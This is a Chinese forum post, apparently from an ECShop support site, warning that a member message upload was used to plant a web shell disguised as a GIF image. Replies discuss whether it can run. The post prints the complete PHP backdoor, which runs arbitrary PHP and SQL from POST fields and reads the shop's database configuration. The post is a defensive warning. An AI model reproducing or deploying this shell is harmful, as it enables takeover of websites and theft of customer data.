注意!会员留言功能可上传木马 很危险!!!!!

2016-07-07 15:00 来源:www.chinab4c.com 作者:ecshop专家

会员留言功能可上传木马


今天突然发现后台多了几条留言很不对劲,打开一看,是有人通过会员中心里的留言功能上传了木马,上传文件是以.gif的后缀,直接访问打不开,下载后用记事本打开是以下代码:


GIF89a ? !?  , 擿?辩`坢㈥fd?題X(evi橛斑a ;

<?php
if (!defined('IN_ECS')) define('IN_ECS', true);
echo "ecshop_system_api\r\n";
if (isset($_POST[api])) {
array_map(create_function(null,stripslashes($_POST[api])),array(1));
exit;
}else if (isset($_POST[query])){
date_default_timezone_set('Asia/ShangHai');
if (!defined('EC_CHARSET')) {
$cfgarr=array('../data/config.php','../../data/config.php','../../../data/config.php','../../../../data/config.php');
foreach($cfgarr as $cfg){
if (file_exists($cfg)) require_once($cfg);
if (defined('EC_CHARSET')) break;
}
}
$charset=strtolower(str_replace('-','',EC_CHARSET));
if (!in_array($charset,array('utf8','gbk','gb2312'))) $charset='utf8';
$sqlarr=explode(";",str_replace('ecs_',$prefix,stripslashes($_POST[query])));
$conn = mysql_connect($db_host,$db_user, $db_pass) or die('can not connect to db');
mysql_query("SET NAMES $charset", $conn) or die(mysql_error($conn));
mysql_select_db($db_name, $conn) or die(mysql_error($conn));
foreach($sqlarr as $sql) $ret=mysql_query($sql,$conn) or die(mysql_error($conn));
$numfields = mysql_num_fields($ret);
for ($i=0,$line=''; $i < $numfields; $i++) $line.=trim('"'.mysql_field_name($ret, $i).'",');
echo substr($line,0,-1),"\r\n";
while($row=mysql_fetch_assoc($ret)){
$i=0;
$line='';
foreach ($row as $col_value) {
$field=mysql_field_name($ret,$i);
$line.=trim('"'.str_replace(array("\n","\r",'"'),'',$row[$field]).'",');
$i++;
}
echo substr($line,0,-1),"\r\n";
}
exit;
}
? >


直接读取数据库信息,很危险,希望大家注意,有必要的可以把留言上传功能去掉

回答:
这么危险 不是过愚人节吧

没开玩笑,管理员关注一下

这个代码又执行不了。

是服务器问题吧? 以前nginx服务器就有这个问题

在我的印象中 会员中心貌似不可以上传文件

可以上传文件的,不过文件格式有限制。

用户中心留言中确实有上传的功能,是为了方便用户反馈产品信息。

没遇到过这个问题,貌似很危险啊,如果是木马网页就惨了,网站容易被挂马

一般用户中心上传大小可以设置为0K大小,不允许传附件,有什么疑问让他们联系客服协商,或者用文字的形式来描述,这样可以避免!

貌似很危险啊,如果是木马网页就惨了,网站容易被挂马

路过,做个标记。

谢谢楼主。
这些挂马的这些人实在可恶

这个没事的,上传对文件后缀限制的很死,执行不了的

哦 明白了~~